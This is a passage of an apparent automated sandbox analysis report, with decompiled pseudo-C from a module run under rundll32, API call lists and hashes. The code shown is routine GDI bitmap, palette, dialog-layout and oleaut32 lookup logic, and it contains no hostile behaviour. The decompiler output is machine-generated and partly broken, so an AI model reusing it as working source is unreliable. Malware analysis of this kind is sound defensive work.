                          				 *0x28657e8 = E027DE180("VarDateFromStr", E027DDE94, _t91);
                          				 *0x28657ec = E027DE180("VarCyFromStr", E027DDF00, _t91);
                          				 *0x28657f0 = E027DE180("VarBoolFromStr", E027DDF6C, _t91);
                          				 *0x28657f4 = E027DE180("VarBstrFromCy", E027DDFEC, _t91);
                          				 *0x28657f8 = E027DE180("VarBstrFromDate", E027DE05C, _t91);
                          				_t46 = E027DE180("VarBstrFromBool", E027DE0CC, _t91);
                          				 *0x28657fc = _t46;
                          				return _t46;
                          			}







                          APIs
                          • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 027DE1B5
                            • Part of subcall function 027DE180: GetProcAddress.KERNEL32(00000000), ref: 027DE199
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                          • API String ID: 1646373207-1918263038
                          • Opcode ID: 2571017160ac2978639900fe9cd35b392694569a228bc5ca249851d9e471646b
                          • Instruction ID: 2076b30c9f888f3c64e6d242e7ddf4e64392cef18c76be39c6482a059678fb84
                          • Opcode Fuzzy Hash: 2571017160ac2978639900fe9cd35b392694569a228bc5ca249851d9e471646b
                          • Instruction Fuzzy Hash: 57416172B44209BBA21B6B6E744842B37FADB497113F2593AF4048F784DD31AC424A3E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 77%
                          			E027F8A88(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
                          				int _v8;
                          				int _v12;
                          				char _v13;
                          				struct HDC__* _v20;
                          				void* _v24;
                          				void* _v28;
                          				long _v32;
                          				long _v36;
                          				struct HPALETTE__* _v40;
                          				intOrPtr* _t78;
                          				struct HPALETTE__* _t89;
                          				struct HPALETTE__* _t95;
                          				int _t171;
                          				intOrPtr _t178;
                          				intOrPtr _t180;
                          				struct HDC__* _t182;
                          				int _t184;
                          				void* _t186;
                          				void* _t187;
                          				intOrPtr _t188;
                          
                          				_t186 = _t187;
                          				_t188 = _t187 + 0xffffffdc;
                          				_v12 = __ecx;
                          				_v8 = __edx;
                          				_t182 = __eax;
                          				_t184 = _a16;
                          				_t171 = _a20;
                          				_v13 = 1;
                          				_t78 =  *0x286478c; // 0x28630d4
                          				if( *_t78 != 2 || _t171 != _a40 || _t184 != _a36) {
                          					_v40 = 0;
                          					_v20 = E027F88E4(CreateCompatibleDC(0));
                          					_push(_t186);
                          					_push(0x27f8d08);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t188;
                          					_v24 = E027F88E4(CreateCompatibleBitmap(_a32, _t171, _t184));
                          					_v28 = SelectObject(_v20, _v24);
                          					_t89 =  *0x28658c8; // 0x570809f5
                          					_v40 = SelectPalette(_a32, _t89, 0);
                          					SelectPalette(_a32, _v40, 0);
                          					if(_v40 == 0) {
                          						_t95 =  *0x28658c8; // 0x570809f5
                          						_v40 = SelectPalette(_v20, _t95, 0xffffffff);
                          					} else {
                          						_v40 = SelectPalette(_v20, _v40, 0xffffffff);
                          					}
                          					RealizePalette(_v20);
                          					StretchBlt(_v20, 0, 0, _t171, _t184, _a12, _a8, _a4, _t171, _t184, 0xcc0020);
                          					StretchBlt(_v20, 0, 0, _t171, _t184, _a32, _a28, _a24, _t171, _t184, 0x440328);
                          					_v32 = SetTextColor(_t182, 0);
                          					_v36 = SetBkColor(_t182, 0xffffff);
                          					StretchBlt(_t182, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t171, _t184, 0x8800c6);
                          					StretchBlt(_t182, _v8, _v12, _a40, _a36, _v20, 0, 0, _t171, _t184, 0x660046);
                          					SetTextColor(_t182, _v32);
                          					SetBkColor(_t182, _v36);
                          					if(_v28 != 0) {
                          						SelectObject(_v20, _v28);
                          					}
                          					DeleteObject(_v24);
                          					_pop(_t178);
                          					 *[fs:eax] = _t178;
                          					_push(0x27f8d0f);
                          					if(_v40 != 0) {
                          						SelectPalette(_v20, _v40, 0);
                          					}
                          					return DeleteDC(_v20);
                          				} else {
                          					_v24 = E027F88E4(CreateCompatibleBitmap(_a32, 1, 1));
                          					_v24 = SelectObject(_a12, _v24);
                          					_push(_t186);
                          					_push(0x27f8b5b);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t188;
                          					MaskBlt(_t182, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E027D6F5C(0xaa0029, 0xcc0020));
                          					_pop(_t180);
                          					 *[fs:eax] = _t180;
                          					_push(0x27f8d0f);
                          					_v24 = SelectObject(_a12, _v24);
                          					return DeleteObject(_v24);
                          				}
                          			}


                          APIs
                          • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 027F8ACB
                          • SelectObject.GDI32(?,?), ref: 027F8AE0
                          • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,027F8B5B,?,?), ref: 027F8B2F
                          • SelectObject.GDI32(?,?), ref: 027F8B49
                          • DeleteObject.GDI32(?), ref: 027F8B55
                          • CreateCompatibleDC.GDI32(00000000), ref: 027F8B69
                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 027F8B8A
                          • SelectObject.GDI32(?,?), ref: 027F8B9F
                          • SelectPalette.GDI32(?,570809F5,00000000), ref: 027F8BB3
                          • SelectPalette.GDI32(?,?,00000000), ref: 027F8BC5
                          • SelectPalette.GDI32(?,00000000,000000FF), ref: 027F8BDA
                          • SelectPalette.GDI32(?,570809F5,000000FF), ref: 027F8BF0
                          • RealizePalette.GDI32(?), ref: 027F8BFC
                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 027F8C1E
                          • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 027F8C40
                          • SetTextColor.GDI32(?,00000000), ref: 027F8C48
                          • SetBkColor.GDI32(?,00FFFFFF), ref: 027F8C56
                          • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 027F8C82
                          • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 027F8CA7
                          • SetTextColor.GDI32(?,?), ref: 027F8CB1
                          • SetBkColor.GDI32(?,?), ref: 027F8CBB
                          • SelectObject.GDI32(?,00000000), ref: 027F8CCE
                          • DeleteObject.GDI32(?), ref: 027F8CD7
                          • SelectPalette.GDI32(?,00000000,00000000), ref: 027F8CF9
                          • DeleteDC.GDI32(?), ref: 027F8D02
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
                          • String ID:
                          • API String ID: 3976802218-0
                          • Opcode ID: 8fbcb78fcb96a928deae127a7a1b6d4f56c153b396b5cfb2a9064f703594cced
                          • Instruction ID: 871c877faec2f26c3c4130f9eedbd370ad0da5d60c4035b13895521e65b032ed
                          • Opcode Fuzzy Hash: 8fbcb78fcb96a928deae127a7a1b6d4f56c153b396b5cfb2a9064f703594cced
                          • Instruction Fuzzy Hash: 8D819FB2A04209AFDB91EFA8DD85FAF7BFDAB0C710F110559F618E7240C635AD018B61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E027FC0C0(void* __eax, long __ecx, struct HPALETTE__* __edx) {
                          				struct HBITMAP__* _v8;
                          				struct HDC__* _v12;
                          				struct HDC__* _v16;
                          				struct HDC__* _v20;
                          				char _v21;
                          				void* _v28;
                          				void* _v32;
                          				intOrPtr _v92;
                          				intOrPtr _v96;
                          				int _v108;
                          				int _v112;
                          				void _v116;
                          				int _t68;
                          				long _t82;
                          				void* _t117;
                          				intOrPtr _t126;
                          				intOrPtr _t127;
                          				long _t130;
                          				struct HPALETTE__* _t133;
                          				void* _t137;
                          				void* _t139;
                          				intOrPtr _t140;
                          
                          				_t137 = _t139;
                          				_t140 = _t139 + 0xffffff90;
                          				_t130 = __ecx;
                          				_t133 = __edx;
                          				_t117 = __eax;
                          				_v8 = 0;
                          				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
                          					return _v8;
                          				} else {
                          					E027FB5B4(_t117);
                          					_v12 = 0;
                          					_v20 = 0;
                          					_push(_t137);
                          					_push(0x27fc2bb);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t140;
                          					_v12 = E027F88E4(GetDC(0));
                          					_v20 = E027F88E4(CreateCompatibleDC(_v12));
                          					_v8 = CreateBitmap(_v112, _v108, 1, 1, 0);
                          					if(_v8 == 0) {
                          						L17:
                          						_t68 = 0;
                          						_pop(_t126);
                          						 *[fs:eax] = _t126;
                          						_push(0x27fc2c2);
                          						if(_v20 != 0) {
                          							_t68 = DeleteDC(_v20);
                          						}
                          						if(_v12 != 0) {
                          							return ReleaseDC(0, _v12);
                          						}
                          						return _t68;
                          					} else {
                          						_v32 = SelectObject(_v20, _v8);
                          						if(_t130 != 0x1fffffff) {
                          							_v16 = E027F88E4(CreateCompatibleDC(_v12));
                          							_push(_t137);
                          							_push(0x27fc273);
                          							_push( *[fs:eax]);
                          							 *[fs:eax] = _t140;
                          							if(_v96 == 0) {
                          								_v21 = 0;
                          							} else {
                          								_v21 = 1;
                          								_v92 = 0;
                          								_t117 = E027FB9F8(_t117, _t133, _t133, 0,  &_v116);
                          							}
                          							_v28 = SelectObject(_v16, _t117);
                          							if(_t133 != 0) {
                          								SelectPalette(_v16, _t133, 0);
                          								RealizePalette(_v16);
                          								SelectPalette(_v20, _t133, 0);
                          								RealizePalette(_v20);
                          							}
                          							_t82 = SetBkColor(_v16, _t130);
                          							BitBlt(_v20, 0, 0, _v112, _v108, _v16, 0, 0, 0xcc0020);
                          							SetBkColor(_v16, _t82);
                          							if(_v28 != 0) {
                          								SelectObject(_v16, _v28);
                          							}
                          							if(_v21 != 0) {
                          								DeleteObject(_t117);
                          							}
                          							_pop(_t127);
                          							 *[fs:eax] = _t127;
                          							_push(0x27fc27a);
                          							return DeleteDC(_v16);
                          						} else {
                          							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
                          							if(_v32 != 0) {
                          								SelectObject(_v20, _v32);
                          							}
                          							goto L17;
                          						}
                          					}
                          				}
                          			}


                          APIs
                          • GetObjectA.GDI32(?,00000054,?), ref: 027FC0E3
                          • GetDC.USER32(00000000), ref: 027FC111
                          • CreateCompatibleDC.GDI32(?), ref: 027FC122
                          • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 027FC13D
                          • SelectObject.GDI32(?,00000000), ref: 027FC157
                          • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 027FC179
                          • CreateCompatibleDC.GDI32(?), ref: 027FC187
                          • SelectObject.GDI32(?), ref: 027FC1CF
                          • SelectPalette.GDI32(?,?,00000000), ref: 027FC1E2
                          • RealizePalette.GDI32(?), ref: 027FC1EB
                          • SelectPalette.GDI32(?,?,00000000), ref: 027FC1F7
                          • RealizePalette.GDI32(?), ref: 027FC200
                          • SetBkColor.GDI32(?), ref: 027FC20A
                          • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 027FC22E
                          • SetBkColor.GDI32(?,00000000), ref: 027FC238
                          • SelectObject.GDI32(?,00000000), ref: 027FC24B
                          • DeleteObject.GDI32 ref: 027FC257
                          • DeleteDC.GDI32(?), ref: 027FC26D
                          • SelectObject.GDI32(?,00000000), ref: 027FC288
                          • DeleteDC.GDI32(00000000), ref: 027FC2A4
                          • ReleaseDC.USER32(00000000,00000000), ref: 027FC2B5
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
                          • String ID:
                          • API String ID: 332224125-0
                          • Opcode ID: cbc0bdfa33fea9602f879296f9c1a03dc762e020b7b8a739b3e5e4ca6ddd6350
                          • Instruction ID: fb6daa60fd5b031679403e4428277f12fd75e91f0c134e1000fd4698f9a8aa66
                          • Opcode Fuzzy Hash: cbc0bdfa33fea9602f879296f9c1a03dc762e020b7b8a739b3e5e4ca6ddd6350
                          • Instruction Fuzzy Hash: 59511B72E04209ABDB52EBF8DC59FAFB7BDEB08714F10445AB614E7280D7759940CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E027FCEC8(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
                          				intOrPtr _v8;
                          				intOrPtr* _v12;
                          				struct HDC__* _v16;
                          				struct HDC__* _v20;
                          				void* _v24;
                          				BITMAPINFOHEADER* _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				signed int _v37;
                          				struct HBITMAP__* _v44;
                          				void* _v48;
                          				struct HPALETTE__* _v52;
                          				struct HPALETTE__* _v56;
                          				intOrPtr* _v60;
                          				intOrPtr* _v64;
                          				short _v66;
                          				short _v68;
                          				signed short _v70;
                          				signed short _v72;
                          				void* _v76;
                          				intOrPtr _v172;
                          				char _v174;
                          				intOrPtr _t150;
                          				signed int _t160;
                          				intOrPtr _t164;
                          				signed int _t193;
                          				signed int _t218;
                          				signed short _t224;
                          				intOrPtr _t251;
                          				intOrPtr* _t255;
                          				intOrPtr _t261;
                          				intOrPtr _t299;
                          				intOrPtr _t300;
                          				intOrPtr _t305;
                          				signed int _t307;
                          				signed int _t327;
                          				void* _t329;
                          				void* _t330;
                          				signed int _t331;
                          				void* _t332;
                          				void* _t333;
                          				void* _t334;
                          				intOrPtr _t335;
                          
                          				_t326 = __edi;
                          				_t333 = _t334;
                          				_t335 = _t334 + 0xffffff54;
                          				_t329 = __ecx;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_v52 = 0;
                          				_v44 = 0;
                          				_v60 = 0;
                          				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t332);
                          				_v37 = _v36 == 0xc;
                          				if(_v37 != 0) {
                          					_v36 = 0x28;
                          				}
                          				_v28 = E027D277C(_v36 + 0x40c);
                          				_v64 = _v28;
                          				_push(_t333);
                          				_push(0x27fd3e5);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t335;
                          				_push(_t333);
                          				_push(0x27fd3b8);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t335;
                          				if(_v37 == 0) {
                          					 *((intOrPtr*)( *_v12 + 0xc))();
                          					_t330 = _t329 - _v36;
                          					_t150 =  *((intOrPtr*)(_v64 + 0x10));
                          					if(_t150 != 3 && _t150 != 0) {
                          						_v60 = E027D31DC(1);
                          						if(_a4 == 0) {
                          							E027D2C20( &_v174, 0xe);
                          							_v174 = 0x4d42;
                          							_v172 = _v36 + _t330;
                          							_a4 =  &_v174;
                          						}
                          						 *((intOrPtr*)( *_v60 + 0x10))();
                          						 *((intOrPtr*)( *_v60 + 0x10))();
                          						 *((intOrPtr*)( *_v60 + 0x10))();
                          						E027EDBA0(_v60,  *_v60, _v12, _t326, _t330, _t330, 0);
                          						 *((intOrPtr*)( *_v60 + 0x14))();
                          						_v12 = _v60;
                          					}
                          				} else {
                          					 *((intOrPtr*)( *_v12 + 0xc))();
                          					_t261 = _v64;
                          					E027D2C20(_t261, 0x28);
                          					_t251 = _t261;
                          					 *(_t251 + 4) = _v72 & 0x0000ffff;
                          					 *(_t251 + 8) = _v70 & 0x0000ffff;
                          					 *((short*)(_t251 + 0xc)) = _v68;
                          					 *((short*)(_t251 + 0xe)) = _v66;
                          					_t330 = _t329 - 0xc;
                          				}
                          				_t255 = _v64;
                          				 *_t255 = _v36;
                          				_v32 = _v28 + _v36;
                          				if( *((short*)(_t255 + 0xc)) != 1) {
                          					E027F87C4();
                          				}
                          				if(_v36 == 0x28) {
                          					_t224 =  *(_t255 + 0xe);
                          					if(_t224 == 0x10 || _t224 == 0x20) {
                          						if( *((intOrPtr*)(_t255 + 0x10)) == 3) {
                          							E027EDB30(_v12, 0xc, _v32);
                          							_v32 = _v32 + 0xc;
                          							_t330 = _t330 - 0xc;
                          						}
                          					}
                          				}
                          				if( *(_t255 + 0x20) == 0) {
                          					 *(_t255 + 0x20) = E027F8A54( *(_t255 + 0xe));
                          				}
                          				_t327 = _v37 & 0x000000ff;
                          				_t267 =  *(_t255 + 0x20) * 0;
                          				E027EDB30(_v12,  *(_t255 + 0x20) * 0, _v32);
                          				_t331 = _t330 -  *(_t255 + 0x20) * 0;
                          				if( *(_t255 + 0x14) == 0) {
                          					_t307 =  *(_t255 + 0xe) & 0x0000ffff;
                          					_t218 = E027F8A74( *((intOrPtr*)(_t255 + 4)), 0x20, _t307);
                          					asm("cdq");
                          					_t267 = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
                          					 *(_t255 + 0x14) = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
                          				}
                          				_t160 =  *(_t255 + 0x14);
                          				if(_t331 > _t160) {
                          					_t331 = _t160;
                          				}
                          				if(_v37 != 0) {
                          					E027F8D1C(_v32);
                          				}
                          				_v16 = E027F88E4(GetDC(0));
                          				_push(_t333);
                          				_push(0x27fd333);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t335;
                          				_t164 =  *((intOrPtr*)(_v64 + 0x10));
                          				if(_t164 == 0 || _t164 == 3) {
                          					if( *0x2863614 == 0) {
                          						_v44 = CreateDIBSection(_v16, _v28, 0,  &_v24, 0, 0);
                          						if(_v44 == 0 || _v24 == 0) {
                          							if(GetLastError() != 0) {
                          								E027DD158(_t255, _t267, _t327, _t331);
                          							} else {
                          								E027F87C4();
                          							}
                          						}
                          						_push(_t333);
                          						_push( *[fs:eax]);
                          						 *[fs:eax] = _t335;
                          						E027EDB30(_v12, _t331, _v24);
                          						_pop(_t299);
                          						 *[fs:eax] = _t299;
                          						_t300 = 0x27fd302;
                          						 *[fs:eax] = _t300;
                          						_push(0x27fd33a);
                          						return ReleaseDC(0, _v16);
                          					} else {
                          						goto L27;
                          					}
                          				} else {
                          					L27:
                          					_v20 = 0;
                          					_v24 = E027D277C(_t331);
                          					_push(_t333);
                          					_push(0x27fd29b);
                          					_push( *[fs:edx]);
                          					 *[fs:edx] = _t335;
                          					_t273 = _t331;
                          					E027EDB30(_v12, _t331, _v24);
                          					_v20 = E027F88E4(CreateCompatibleDC(_v16));
                          					_v48 = SelectObject(_v20, CreateCompatibleBitmap(_v16, 1, 1));
                          					_v56 = 0;
                          					_t193 =  *(_v64 + 0x20);
                          					if(_t193 > 0) {
                          						_t273 = _t193;
                          						_v52 = E027F8FD4(0, _t193);
                          						_v56 = SelectPalette(_v20, _v52, 0);
                          						RealizePalette(_v20);
                          					}
                          					_push(_t333);
                          					_push(0x27fd26f);
                          					_push( *[fs:edx]);
                          					 *[fs:edx] = _t335;
                          					_v44 = CreateDIBitmap(_v20, _v28, 4, _v24, _v28, 0);
                          					if(_v44 == 0) {
                          						if(GetLastError() != 0) {
                          							E027DD158(_t255, _t273, _t327, _t331);
                          						} else {
                          							E027F87C4();
                          						}
                          					}
                          					_pop(_t305);
                          					 *[fs:eax] = _t305;
                          					_push(0x27fd276);
                          					if(_v56 != 0) {
                          						SelectPalette(_v20, _v56, 0xffffffff);
                          					}
                          					return DeleteObject(SelectObject(_v20, _v48));
                          				}
                          			}


                          APIs
                          • GetDC.USER32(00000000), ref: 027FD132
                          • CreateCompatibleDC.GDI32(00000001), ref: 027FD197
                          • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 027FD1AC
                          • SelectObject.GDI32(?,00000000), ref: 027FD1B6
                          • SelectPalette.GDI32(?,?,00000000), ref: 027FD1E6
                          • RealizePalette.GDI32(?), ref: 027FD1F2
                          • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 027FD216
                          • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,027FD26F,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 027FD224
                          • SelectPalette.GDI32(?,00000000,000000FF), ref: 027FD256
                          • SelectObject.GDI32(?,?), ref: 027FD263
                          • DeleteObject.GDI32(00000000), ref: 027FD269
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                          • String ID: ($BM
                          • API String ID: 2831685396-2980357723
                          • Opcode ID: 9a22edad3cb5c9c86f959ec9025b7a29045a6b87bd93ae57dac1670e20c961b1
                          • Instruction ID: d8a3e3a9a3fe25f5326afcf9618d6b995faddfd0b870f91bd5631c1b2b199197
                          • Opcode Fuzzy Hash: 9a22edad3cb5c9c86f959ec9025b7a29045a6b87bd93ae57dac1670e20c961b1
                          • Instruction Fuzzy Hash: 3DD13875A042089FDF55EFA8C898BAEBBB6FF49314F048469EA04EB354D7349841CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E028028B8(intOrPtr __eax, void* __ebx, signed char __ecx, char __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                          				intOrPtr _v8;
                          				char _v9;
                          				signed int _v11;
                          				intOrPtr* _v16;
                          				int _v20;
                          				int _v24;
                          				int _v28;
                          				int _v32;
                          				int _v36;
                          				int _v40;
                          				signed int _v44;
                          				int _v48;
                          				signed int _v52;
                          				intOrPtr _v56;
                          				signed int _v60;
                          				intOrPtr _v64;
                          				char _v65;
                          				char _v66;
                          				intOrPtr* _v72;
                          				intOrPtr* _v76;
                          				intOrPtr* _v80;
                          				intOrPtr* _v84;
                          				struct tagRECT _v100;
                          				char _v104;
                          				char _v108;
                          				char _v112;
                          				char _v116;
                          				intOrPtr _t206;
                          				intOrPtr* _t220;
                          				int _t223;
                          				signed int _t227;
                          				void* _t231;
                          				CHAR* _t234;
                          				signed int _t242;
                          				intOrPtr* _t253;
                          				signed int _t258;
                          				intOrPtr* _t261;
                          				signed int _t266;
                          				intOrPtr* _t269;
                          				signed int _t298;
                          				signed int _t299;
                          				intOrPtr _t323;
                          				void* _t341;
                          				signed int _t355;
                          				signed int _t360;
                          				CHAR* _t367;
                          				int _t378;
                          				void* _t379;
                          				void* _t380;
                          				void* _t381;
                          				void* _t382;
                          				signed int _t424;
                          				signed int _t427;
                          				intOrPtr _t446;
                          				void* _t453;
                          				CHAR* _t462;
                          				int _t466;
                          				intOrPtr* _t467;
                          				intOrPtr _t468;
                          				intOrPtr* _t473;
                          				void* _t474;
                          				void* _t476;
                          				void* _t480;
                          				void* _t484;
                          				void* _t488;
                          				void* _t493;
                          				void* _t494;
                          				void* _t503;
                          				void* _t509;
                          
                          				_t509 = __fp0;
                          				_v116 = 0;
                          				_v112 = 0;
                          				_v108 = 0;
                          				_v104 = 0;
                          				_v11 = __ecx;
                          				_v9 = __edx;
                          				_v8 = __eax;
                          				 *[fs:eax] = _t476 + 0xffffff90;
                          				_v16 = E028023E0(1, __edi);
                          				 *((intOrPtr*)( *_v16 + 0x70))( *[fs:eax], 0x2802e28, _t476, __edi, __esi, __ebx, _t474);
                          				E02816DE4(_v16, 3);
                          				E027F83E8(E028171C0(_v16));
                          				 *((char*)(_v16 + 0x22d)) = 1;
                          				_t206 = _v16;
                          				 *((intOrPtr*)(_t206 + 0x1dc)) = _v16;
                          				 *((intOrPtr*)(_t206 + 0x1d8)) = E02802470;
                          				E02802214(E028171C0(_v16),  &_v24);
                          				_t378 = _v24;
                          				_v28 = MulDiv(8, _t378, 4);
                          				_t466 = _v20;
                          				_v32 = MulDiv(8, _t466, 8);
                          				_v36 = MulDiv(0xa, _t378, 4);
                          				_v40 = MulDiv(0xa, _t466, 8);
                          				_v44 = MulDiv(0x32, _t378, 4);
                          				_t379 = 0;
                          				_t467 = 0x2865a84;
                          				_v80 = 0x2863984;
                          				do {
                          					_t480 = _t379 - 0xf;
                          					if(_t480 <= 0) {
                          						asm("bt [ebp-0x7], eax");
                          					}
                          					if(_t480 < 0) {
                          						if( *_t467 == 0) {
                          							E027E9BA4(0, 0, 0,  &_v100, 0);
                          							_t360 = E0282FAA8(_v16);
                          							E027D6018( *_v80,  &_v104);
                          							_t367 = E027D45A8(_v104);
                          							DrawTextA(E027F84EC(E028171C0(_v16)), _t367, 0xffffffff,  &_v100, _t360 | 0x00000420);
                          							 *_t467 = _v100.right - _v100.left + 8;
                          						}
                          						_t355 =  *_t467;
                          						if(_t355 > _v44) {
                          							_v44 = _t355;
                          						}
                          					}
                          					_t379 = _t379 + 1;
                          					_v80 = _v80 + 4;
                          					_t467 = _t467 + 4;
                          					_t484 = _t379 - 0xb;
                          				} while (_t484 != 0);
                          				_v48 = MulDiv(0xe, _v20, 8);
                          				_v52 = MulDiv(4, _v24, 4);
                          				_push(0);
                          				_t220 =  *0x2864774; // 0x2865b5c
                          				_t223 = E0281B960( *_t220) >> 1;
                          				if(_t484 < 0) {
                          					asm("adc eax, 0x0");
                          				}
                          				SetRect( &_v100, 0, 0, _t223, ??);
                          				_t227 = E0282FAA8(_v16);
                          				_t231 = E027D43A8(_v8);
                          				_t234 = E027D45A8(_v8);
                          				DrawTextA(E027F84EC(E028171C0(_v16)), _t234, _t231 + 1,  &_v100, _t227 | 0x00000450);
                          				_t462 =  *0x02863944;
                          				_t468 = _v100.right;
                          				_v56 = _v100.bottom;
                          				if(_t462 != 0) {
                          					_t468 = _t468 + _v36 + 0x20;
                          					if(_v56 < 0x20) {
                          						_v56 = 0x20;
                          					}
                          				}
                          				_t242 = 0;
                          				_t380 = 0;
                          				do {
                          					_t488 = _t380 - 0xf;
                          					if(_t488 <= 0) {
                          						asm("bt [ebp-0x7], edx");
                          					}
                          					if(_t488 < 0) {
                          						_t242 = _t242 + 1;
                          					}
                          					_t380 = _t380 + 1;
                          				} while (_t380 != 0xb);
                          				_t381 = 0;
                          				if(_t242 != 0) {
                          					_t381 = _v44 * _t242 + (_t242 - 1) * _v52;
                          				}
                          				E02816288(_v16, E027FE86C(_t468, _t381) + _v28 + _v28);
                          				_t493 = _v56 + _v48 + _v40 + _v32 + _v32;
                          				E028162D8(_v16, _v56 + _v48 + _v40 + _v32 + _v32);
                          				_t253 =  *0x2864774; // 0x2865b5c
                          				_t424 = E0281B960( *_t253) >> 1;
                          				if(_t493 < 0) {
                          					asm("adc edx, 0x0");
                          				}
                          				_t258 =  *(_v16 + 0x48) >> 1;
                          				if(_t493 < 0) {
                          					asm("adc eax, 0x0");
                          				}
                          				_t494 = _t424 - _t258;
                          				E0282CE98(_v16);
                          				_t261 =  *0x2864774; // 0x2865b5c
                          				_t427 = E0281B940( *_t261) >> 1;
                          				if(_t494 < 0) {
                          					asm("adc edx, 0x0");
                          				}
                          				_t266 =  *(_v16 + 0x4c) >> 1;
                          				if(_t494 < 0) {
                          					asm("adc eax, 0x0");
                          				}
                          				E0282CEBC(_v16, _t427 - _t266);
                          				if(_v9 == 4) {
                          					_t269 =  *0x28645d4; // 0x2865b58
                          					E0281E19C( *_t269,  &_v112);
                          					E0282D780(_v16, _t381, _v112, _t468);
                          				} else {
                          					E027D6018( *0x02863930,  &_v108);
                          					E0282D780(_v16, _t381, _v108, _t468);
                          				}
                          				_t496 = _t462;
                          				if(_t462 != 0) {
                          					_v72 = E02803800(1);
                          					 *((intOrPtr*)( *_v72 + 0x18))();
                          					 *((intOrPtr*)( *_v72 + 0x68))();
                          					_push(LoadIconA(0, _t462));
